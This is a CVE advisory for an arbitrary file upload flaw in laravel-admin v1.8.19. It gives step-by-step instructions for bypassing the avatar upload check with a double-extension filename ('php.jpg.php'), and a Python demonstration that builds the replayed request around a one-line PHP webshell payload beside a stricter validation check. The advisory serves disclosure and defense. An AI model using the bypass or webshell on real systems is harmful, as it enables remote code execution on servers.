CVE-2023-24249
laravel-admin is an administrative interface builder for Laravel that helps you build CRUD backends with just a few lines of code.
There is a problem in laravel-admin that allows attackers to bypass the file upload restrictions and upload files with a *.php extension, leading to remote code execution.
Suggested description
An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.
Vulnerability Type: Other (File Upload)
Vendor of Product
https://github.com/z-song/laravel-admin
Affected Product Code Base
laravel-admin - v1.8.19
Affected Component
The avatar upload on the user settings page. The file upload restriction can be bypassed, so an attacker can upload a *.php file and achieve remote code execution.
Attack Type
Remote
Impact: Code execution (true)
Details
After logging in to the laravel-admin backend, open the "User settings" (用户设置) page, change the user's avatar, save it, and capture the resulting upload request with an intercepting proxy.
Upload a PHP file renamed with a .jpg extension.
Try to modify avatar
Upload .jpg file
After the upload succeeds, replay the captured request with the filename in the multipart form data changed so that it ends in ".php".
e.g.: php.jpg.php
Replay the request
Upload succeeded
Refresh the user settings page; it reports that the upload succeeded and shows the URL of the uploaded PHP file.
PHP file is executed
The vulnerability affects the latest version of laravel-admin (v1.8.19).
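The bypass above works because the replayed request carries an attacker-controlled filename (and an attacker-controlled part Content-Type) that the server trusts. The following example is added to this write-up and is not laravel-admin's code; the report does not show which check laravel-admin performs, so `weak_check` is a hypothetical stand-in for a filter that looks for an image extension anywhere in the name, shown beside a `strict_check` that only honours the final extension, verifies magic bytes, and never reuses the client-supplied name. `multipart_body` rebuilds the replayed request body so the attacker-controlled filename field is visible.

```python
"""
Constructed demonstration of the double-extension upload bypass class
described in the report. This is example code written for this write-up,
not laravel-admin's implementation. All names and the magic-byte table are
assumptions for illustration.
"""
import os
import re
import secrets
from typing import Optional

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Leading magic bytes for the image types we accept (constructed table).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def weak_check(filename: str) -> bool:
    """Hypothetical weak filter: accepts any name that contains an allowed
    image extension anywhere, so 'php.jpg.php' slips through."""
    lower = filename.lower()
    return any(f".{ext}" in lower for ext in ALLOWED_EXT)


def strict_check(filename: str, content: bytes) -> bool:
    """Server-side check: only the final extension counts (that is the one the
    web server dispatches on), it must be on the allowlist, and the content
    must start with the magic bytes of that type."""
    base = os.path.basename(filename)
    if "." not in base:
        return False
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXT:
        return False
    return content.startswith(MAGIC[ext])


def stored_name(filename: str, content: bytes) -> Optional[str]:
    """Return a server-chosen storage name (random token plus the validated
    extension), or None if the upload is rejected. The client-supplied name
    is never used on disk."""
    if not strict_check(filename, content):
        return None
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def multipart_body(field: str, filename: str, content: bytes,
                   boundary: str = "----WebKitFormBoundaryXYZ") -> bytes:
    """Build the multipart/form-data body of the replayed request. Both the
    filename and the part Content-Type are attacker-controlled, which is why
    neither can be trusted by the server."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: image/jpeg\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail


def filename_from_body(body: bytes) -> str:
    """Extract the filename the server would see from a multipart body."""
    m = re.search(rb'filename="([^"]*)"', body)
    return m.group(1).decode() if m else ""


# Constructed sample payloads.
PHP_WEBSHELL = b"<?php system($_GET['cmd']); ?>"      # renamed php.jpg.php in the replay
REAL_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16        # minimal JPEG header stub


if __name__ == "__main__":
    replay = multipart_body("avatar", "php.jpg.php", PHP_WEBSHELL)
    name = filename_from_body(replay)
    print("filename in replayed request:", name)
    print("weak_check accepts:", weak_check(name))
    print("strict_check accepts:", strict_check(name, PHP_WEBSHELL))
    print("stored as:", stored_name("avatar.jpg", REAL_JPEG))
```

Checking only the final extension matters because that is what the web server uses to decide whether to hand the file to PHP; a check that is satisfied by ".jpg" appearing anywhere in the name, or by the part's Content-Type header, is defeated by exactly the replay shown in the report. Even with this check in place, uploads should be stored outside the web root or in a directory where script execution is disabled.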
Others
CVE ID: CVE-2023-24249
Github: https://github.com/z-song/laravel-admin
Official website: https://laravel-admin.org/
Issues page: https://github.com/z-song/laravel-admin/issues/5726